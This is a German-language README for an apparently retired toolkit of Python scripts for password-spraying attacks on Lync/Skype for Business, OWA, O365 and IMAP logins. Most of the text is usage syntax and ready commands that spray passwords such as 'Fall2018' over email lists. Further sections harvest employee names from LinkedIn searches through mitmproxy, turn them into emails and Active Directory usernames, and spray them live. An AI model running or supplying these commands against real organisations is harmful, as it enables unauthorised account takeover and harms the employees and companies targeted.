
Skripte, um Password-Spraying-Angriffe gegen Lync/S4B, OWA & O365 deutlich schneller, weniger schmerzhaft und effizienter zu machen.
Dieses Projekt wird nicht mehr weitergepflegt. Die folgenden Alternativprojekte sind besser und werden aktiv gewartet:
Eine Sammlung von Python-Skripten/Dienstprogrammen, die versucht, Passwort-Spraying-Angriffe gegen Lync/S4B und OWA erheblich schneller, weniger schmerzhaft und effizienter zu machen.
Komm auf Discord vorbei!
Installiere die Voraussetzungen mit pip3 wie folgt:
sudo -H pip3 install -r requirements.txt
Oder nutze eine Python- virtuelle Umgebung, wenn du die Pakete nicht global installieren möchtest.
Ein extrem schneller Passwort-Sprayer für Lync/Skype For Business und OWA, basierend auf Asyncio und Python 3.7
Usage:
atomizer (lync|owa|imap) <target> <password> <userfile> [--targetPort PORT] [--threads THREADS] [--debug]
atomizer (lync|owa|imap) <target> <passwordfile> <userfile> --interval <TIME> [--gchat <URL>] [--slack <URL>] [--targetPort PORT][--threads THREADS] [--debug]
atomizer (lync|owa|imap) <target> --csvfile CSVFILE [--user-row-name NAME] [--pass-row-name NAME] [--targetPort PORT] [--threads THREADS] [--debug]
atomizer (lync|owa|imap) <target> --user-as-pass USERFILE [--targetPort PORT] [--threads THREADS] [--debug]
atomizer (lync|owa|imap) <target> --recon [--debug]
atomizer -h | --help
atomizer -v | --version
Arguments:
target Zieldomäne oder URL
password Passwort für das Spraying
userfile Datei mit Benutzernamen (einer pro Zeile)
passwordfile Datei mit Passwörtern (eines pro Zeile)
Options:
-h, --help diesen Bildschirm anzeigen
-v, --version Version anzeigen
-c, --csvfile CSVFILE CSV-Datei mit Benutzernamen und Passwörtern
-i, --interval TIME Spraying im angegebenen Intervall [Format: "H:M:S"]
-t, --threads THREADS Anzahl der zu verwendenden gleichzeitigen Threads [Standard: 3]
-d, --debug Debug-Ausgabe aktivieren
-p, --targetPort PORT Zielport des IMAP-Servers (nur IMAP) [Standard: 993]
--recon nur Informationen sammeln, kein Passwort-Spraying
--gchat URL gchat-Webhook-URL für Benachrichtigungen
--slack URL slack-Webhook-URL für Benachrichtigungen
--user-row-name NAME Titel der Benutzernamen-Zeile in der CSV-Datei [Standard: Email Address]
--pass-row-name NAME Titel der Passwort-Zeile in der CSV-Datei [Standard: Password]
--user-as-pass USERFILE die Benutzernamen in der angegebenen Datei als Passwort verwenden (einer pro Zeile)
./atomizer.py owa contoso.com 'Fall2018' emails.txt
./atomizer.py lync contoso.com 'Fall2018' emails.txt
./atomizer lync contoso.com --csvfile accounts.csv
./atomizer lync contoso.com --user-as-pass usernames.txt
./atomizer owa 'https://owa.contoso.com/autodiscover/autodiscover.xml' --recon
./atomizer.py owa contoso.com passwords.txt emails.txt -i 0:45:00 --gchat <GCHAT_WEBHOOK_URL>
Ein Port von @OrOneEqualsOnes GatherContacts Burp-Erweiterung auf mitmproxy mit einigen Verbesserungen.
Durchsucht Google und Bing nach LinkedIn-Profilen, generiert automatisch E-Mails aus den Profilnamen mithilfe des angegebenen Musters und führt Passwort-Spraying in Echtzeit durch.
(Basiert auf Atomizer)
mitmdump -s vaporizer.py --set sprayer=(lync|owa) --set domain=domain.com --set target=<domain or url to spray> --set password=password --set email_format='{f}.{last}'
Standardmäßig ist email_format auf das Muster {first}.{last} gesetzt und ist kein Pflichtargument.
Der Parameter domain ist die Domäne, die zum Generieren von E-Mails aus Namen verwendet wird. Der Parameter target ist die Domäne oder URL, gegen die das Passwort-Spraying durchgeführt werden soll.
Installiere das mitmproxy-Zertifikat, setze den Proxy in deinem Browser, gehe zu Google und/oder Bing und suche (stelle sicher, dass du /in einfügst):
site:linkedin.com/in "Target Company Name"
Die E-Mails werden im angegebenen Format in emails.txt ausgegeben und an Atomizer zum Spraying übergeben.
Sammelt den gesamten Text der Zielwebsite und sendet ihn zur Analyse an AWS Comprehend, um benutzerdefinierte Wortlisten für Passwort-Spraying zu erstellen.
Noch in Arbeit
mitmdump -s aerosol.py --set domain=domain.com
Konvertiert Namen in Active-Directory-Benutzernamen (z. B. Alice Eve => CONTOSO\aeve)
Usage:
spindrift [<file>] [--target TARGET | --domain DOMAIN] [--format FORMAT]
Arguments:
file Datei mit Namen, kann auch von stdin lesen
Options:
--target TARGET optionale Domäne oder URL, um den internen Domänennamen von OWA abzurufen
--domain DOMAIN Domäne manuell angeben, die jedem Benutzernamen vorangestellt wird
--format FORMAT Benutzernamen-Format [Standard: {f}{last}]
Liest Namen von STDIN, --domain wird verwendet, um die Domäne manuell anzugeben:
cat names.txt | ./spindrift.py --domain CONTOSO
Liest Namen aus names.txt, --target ruft den internen Domänennamen dynamisch von OWA ab (du kannst eine Domäne oder URL angeben):
./spindrift.py names.txt --target contoso.com